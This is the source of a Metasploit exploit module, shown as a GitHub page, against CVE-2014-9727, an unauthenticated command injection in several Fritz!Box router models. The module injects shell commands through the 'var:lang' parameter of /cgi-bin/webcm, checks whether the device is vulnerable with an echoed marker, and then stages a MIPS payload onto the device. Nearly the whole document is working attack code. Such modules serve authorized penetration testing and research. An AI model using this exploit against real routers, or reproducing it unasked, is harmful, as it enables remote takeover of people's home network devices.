/metasploit-framework

Permalink
Switch branches/tags
v4.11.7 blog-20150827 blog-20150813 blog-20150730 blog-20150723 blog-20150702 2015071402 2015070901 2015063001 20150827 4.17.14 4.17.13 4.17.12 4.17.11 4.17.10 4.17.9 4.17.8 4.17.7 4.17.6 4.17.5 4.17.4 4.17.3 4.17.2 4.17.1 4.17.0 4.16.65 4.16.64 4.16.63 4.16.62 4.16.61 4.16.60 4.16.59 4.16.58 4.16.57 4.16.56 4.16.55 4.16.54 4.16.53 4.16.52 4.16.51 4.16.50 4.16.49 4.16.48 4.16.47 4.16.46 4.16.45 4.16.44 4.16.43 4.16.42 4.16.41 4.16.40 4.16.39 4.16.38 4.16.37 4.16.36 4.16.35 4.16.34 4.16.33 4.16.32 4.16.31 4.16.30 4.16.29 4.16.28 4.16.27 4.16.26 4.16.25 4.16.24 4.16.23 4.16.22 4.16.21 4.16.20 4.16.19 4.16.18 4.16.17 4.16.16 4.16.15 4.16.14 4.16.13 4.16.12 4.16.11 4.16.10 4.16.9 4.16.8 4.16.7 4.16.6 4.16.5 4.16.4 4.16.3 4.16.2 4.16.1 4.16.0 4.15.8 4.15.7 4.15.6 4.15.5 4.15.4 4.15.3 4.15.2 4.15.1 4.15.0
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
Raw Blame History
116 lines (105 sloc) 3.65 KB
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection',
'Description' => %q{
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'Fabian Braeunlein <fabian[at]breaking.systems>', # Metasploit PoC with wget method
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-9727' ],
[ 'OSVDB', '103289' ],
[ 'BID', '65520' ],
[ 'URL', 'http://www.kapple.de/?p=75' ], # vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], # probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], # published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], # vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] # writeup with PoC
],
'DisclosureDate' => 'Feb 11 2014',
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&echo -e \"\\n\\n#{clue}\""
}
})
if res && res.body =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&#{cmd}",
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("Trying to access the vulnerable URL...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("Exploiting...")
execute_cmdstager(
flavor: :echo,
linemax: 92
)
end
end